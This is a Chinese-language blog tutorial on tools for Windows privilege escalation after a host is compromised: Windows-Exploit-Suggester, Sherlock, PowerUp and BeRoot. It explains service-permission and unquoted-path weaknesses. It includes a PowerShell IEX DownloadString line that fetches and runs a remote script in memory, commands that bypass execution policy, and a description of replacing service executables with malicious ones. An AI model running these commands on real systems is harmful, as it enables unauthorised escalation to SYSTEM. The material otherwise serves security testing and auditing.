大家好,我是Alex。今天给大家介绍几个工具方便在windows下提升权限。
Windows-Exploit-Suggester
https://github.com/GDSSecurity/Windows-Exploit-Suggester
它需要从Windows主机输出“systeminfo”命令,以便比较Microsoft安全公告数据库并确定主机的补丁级别。
安装依赖关系python-xlrd,$ pip install xlrd –upgrade
使用--update从Microsoft自动下载安全公告数据库,并将其另存为Excel电子表格。
在靶机被攻陷后,使用systeminfo命令查看系统详情,并写入txt文件
使用命令./windows-exploit-suggester.py --database 2017-04-26-mssb.xls--systeminfo systeminfo.txt来比对结果,
部分截图如下
也可使用命令./windows-exploit-suggester.py --database2014-06-06-mssb.xlsx --ostext 'windows server 2008 r2'来获取所有windows server 2008 r2所有公开漏洞
-h 可以查看帮助。
Sherlock
https://github.com/rasta-mouse/Sherlock
打开powershell 远程加载脚本
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
也可本地加载脚本 Import-ModuleSherlock.ps1
使用命令Find-AllVulns查看漏洞版本
显示Appears Vulnerable为可用漏洞。
使用Get-Architecture获取CPU架构
使用Get-FileVersionInfo查看软件版本信息
PowerUp
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
“系统服务错误权限配置漏洞”简介
Windows系统服务文件在操作系统启动时会加载执行,并且在后台调用可执行文件。比如,JAVA升级程序,每次重启系统时,JAVA升级程序会检测Oracle网站,是否有新版JAVA程序。而类似JAVA程序之类的系统服务程序加载时往往都是运行在系统权限上的。所以如果一个低权限的用户对于此类系统服务调用的可执行文件具有可写的权限,那么就可以将其替换成我们的恶意可执行文件,从而随着系统启动服务而获得系统权限。
上传脚本后,在CMD下执行命令在内存中加载脚本,
powershell -nop-exec bypass -c “IEX (New-ObjectNet.WebClient).DownloadString('c:/PowerUp.ps1');Invoke-AllChecks”
或本地隐藏权限绕过执行
powershell.exe-exec bypass -Command "& "
第一条不成功便执行第二条。
补充:
-NoProfile(-NoP):PowerShell控制台不加载当前用户的配置
-Exec Bypass:绕过执行安全策略
Import-Module:加载脚本
部分截图
我们可以使用icacls来验证下PowerUp脚本检测的结果
Github上有详细的用法参数,不再细说。
BeRoot
https://github.com/AlessandroZ/BeRoot
“TrustedService Paths”漏洞是由系统中的“CreateProcess”函数引起的,利用了windows文件路径解析的特性,并涉及了服务路径的文件/文件夹权限,存在缺陷的服务程序利用了属于可执行文件的文件/文件夹权限。如果权限合适,我们可以上传恶意可执行文件。简单讲就是查找系统服务文件中存在非引用路径。如果一个服务调用可执行文件,没有正确处理引用的全路径名,就可以利用这个漏洞。
工具只能用来检测,无法直接利用目标系统中存在的漏洞
可以参考链接:http://www.freebuf.com/sectool/132806.html
你可能喜欢
领取专属 10元无门槛券
私享最新 技术干货